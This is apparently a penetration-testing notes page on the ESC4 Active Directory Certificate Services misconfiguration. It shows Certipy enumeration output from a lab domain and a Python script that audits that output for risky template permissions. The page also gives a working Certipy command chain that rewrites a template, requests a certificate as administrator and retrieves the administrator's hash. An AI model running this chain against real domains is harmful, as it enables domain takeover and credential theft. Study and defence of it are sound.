👾 Overview
ESC4 is a common ADCS vulnerability in which a misconfigured certificate template grants dangerous object-control permissions (such as Full Control, Write Owner, Write DACL, or Write Property) to a given user or group. A principal holding those rights can rewrite the template so that it becomes vulnerable to ESC1.
🔍 Discovery
Certipy is the go-to tool for finding and exploiting many common ADCS vulnerabilities.
```bash
# Enumerate ADCS vulnerabilities with certipy
certipy-ad find -username [username]@[domain] -password [password] -dc-ip [IP]
```
Running Certipy requires a domain user. It generates multiple output files, including JSON, which can be examined manually or imported into BloodHound.
In the JSON output, Certipy flags a vulnerable template as follows:
```json
"Certificate Templates": {
  "0": {
    "Template Name": "SendaiComputer",
    "Display Name": "SendaiComputer",
    "Certificate Authorities": [
      "sendai-DC-CA"
    ],
    "Enabled": true,
    "Client Authentication": true,
    "Enrollment Agent": false,
    "Any Purpose": false,
    "Enrollee Supplies Subject": false,
    "Certificate Name Flag": [
      "SubjectAltRequireDns"
    ],
    "Enrollment Flag": [
      "AutoEnrollment"
    ],
    "Private Key Flag": [
      "16842752"
    ],
    "Extended Key Usage": [
      "Server Authentication",
      "Client Authentication"
    ],
    "Requires Manager Approval": false,
    "Requires Key Archival": false,
    "Authorized Signatures Required": 0,
    "Validity Period": "100 years",
    "Renewal Period": "6 weeks",
    "Minimum RSA Key Length": 4096,
    "Permissions": {
      "Enrollment Permissions": {
        "Enrollment Rights": [
          "SENDAI.VL\\Domain Admins",
          "SENDAI.VL\\Domain Computers",
          "SENDAI.VL\\Enterprise Admins"
        ]
      },
      "Object Control Permissions": {
        "Owner": "SENDAI.VL\\Administrator",
        "Full Control Principals": [
          "SENDAI.VL\\ca-operators"
        ],
        "Write Owner Principals": [
          "SENDAI.VL\\Domain Admins",
          "SENDAI.VL\\Enterprise Admins",
          "SENDAI.VL\\Administrator",
          "SENDAI.VL\\ca-operators"
        ],
        "Write Dacl Principals": [
          "SENDAI.VL\\Domain Admins",
          "SENDAI.VL\\Enterprise Admins",
          "SENDAI.VL\\Administrator",
          "SENDAI.VL\\ca-operators"
        ],
        "Write Property Principals": [
          "SENDAI.VL\\Domain Admins",
          "SENDAI.VL\\Enterprise Admins",
          "SENDAI.VL\\Administrator",
          "SENDAI.VL\\ca-operators"
        ]
      }
    },
    "[!] Vulnerabilities": {
      "ESC4": "'SENDAI.VL\\\\ca-operators' has dangerous permissions"
    }
  }
}
```
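As an added example (not part of the original notes, nor Certipy's own code), the following script audits a Certipy `find` JSON report for the ESC4 condition shown above: any principal outside an allowlist of expected administrative groups owning, or holding a write right over, an enabled template. The embedded sample is constructed from the snippet above, and the allowlist is an assumption to tune for the domain being audited.

```python
import json

# Object-control rights that let a principal rewrite a template (the ESC4 condition).
WRITE_RIGHTS = ("Full Control Principals", "Write Owner Principals",
                "Write Dacl Principals", "Write Property Principals")

# Assumed allowlist of principals expected to control templates; tune per domain.
TRUSTED_SUFFIXES = ("\\Domain Admins", "\\Enterprise Admins", "\\Administrator")


def is_trusted(principal: str) -> bool:
    return principal.endswith(TRUSTED_SUFFIXES)


def find_esc4(report: dict) -> list[dict]:
    """Enabled templates where an untrusted principal owns or can write the template."""
    findings = []
    for entry in report.get("Certificate Templates", {}).values():
        if not entry.get("Enabled", False):
            continue  # a disabled template cannot be enrolled from, so skip it
        ctrl = entry.get("Permissions", {}).get("Object Control Permissions", {})
        untrusted = {}
        owner = ctrl.get("Owner", "")
        if owner and not is_trusted(owner):
            untrusted["Owner"] = [owner]
        for right in WRITE_RIGHTS:
            bad = sorted(p for p in ctrl.get(right, []) if not is_trusted(p))
            if bad:
                untrusted[right] = bad
        if untrusted:
            findings.append({"template": entry["Template Name"], "untrusted": untrusted})
    return findings


# Constructed sample, trimmed from the Certipy output discussed above.
SAMPLE = json.loads(r'''{"Certificate Templates": {
  "0": {"Template Name": "SendaiComputer", "Enabled": true, "Permissions": {
    "Object Control Permissions": {
      "Owner": "SENDAI.VL\\Administrator",
      "Full Control Principals": ["SENDAI.VL\\ca-operators"],
      "Write Owner Principals": ["SENDAI.VL\\Domain Admins", "SENDAI.VL\\ca-operators"],
      "Write Dacl Principals": ["SENDAI.VL\\Domain Admins", "SENDAI.VL\\ca-operators"],
      "Write Property Principals": ["SENDAI.VL\\Domain Admins", "SENDAI.VL\\ca-operators"]}}},
  "1": {"Template Name": "User", "Enabled": true, "Permissions": {
    "Object Control Permissions": {"Owner": "SENDAI.VL\\Administrator",
      "Full Control Principals": ["SENDAI.VL\\Domain Admins"]}}}}}''')

if __name__ == "__main__":
    for finding in find_esc4(SAMPLE):
        print(finding["template"], "->", finding["untrusted"])
```

Point `find_esc4` at `json.load(open("<certipy-output>_Certipy.json"))` to run it over a real report; the matching is deliberately strict on the `DOMAIN\\group` suffix so a similarly named account does not slip through.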
📌 Exploitation
To exploit this, you need access to the user or group that holds write permissions over the template (ca-operators in the example above), and you temporarily rewrite the template so that it is vulnerable to ESC1.
```bash
# Make template vulnerable to ESC1
certipy template -username [username]@[domain] -password [pass] -dc-ip [IP] -template [template] -save-old
```
This makes the template vulnerable to ESC1 and saves a backup of the original configuration that can be restored later. Next, exploit ESC1 by requesting a certificate for the administrator account.
```bash
# Exploit ESC1
certipy req -username [username]@[domain] -password [pass] -dc-ip [ip] -ca [ca-name] -target [dc-hostname] -template [template] -upn administrator@[domain]
```
The resulting certificate can then be used to authenticate and retrieve the administrator’s hash.
```bash
# Authenticate and get the user's hash
sudo certipy-ad auth -pfx '[USERNAME].pfx' -username '[USERNAME]' -domain '[domain]' -dc-ip [ip]
```
✨ Post-Exploitation
Afterwards, restore the original template from the saved backup to clean up.
```bash
# Restore config
certipy template -username [username]@[domain] -password [pass] -dc-ip [ip] -template [template] -configuration [template].json
```
📝 Resources
| 🔗 Hyperlink | ℹ️ Info |
|---|---|
| SpecterOps | Certified Pre-Owned |